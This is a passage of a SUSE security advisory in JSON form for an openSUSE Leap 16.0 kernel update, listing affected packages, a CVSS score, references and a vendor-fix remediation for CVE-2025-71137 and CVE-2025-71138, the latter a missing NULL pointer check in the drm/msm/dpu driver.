"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
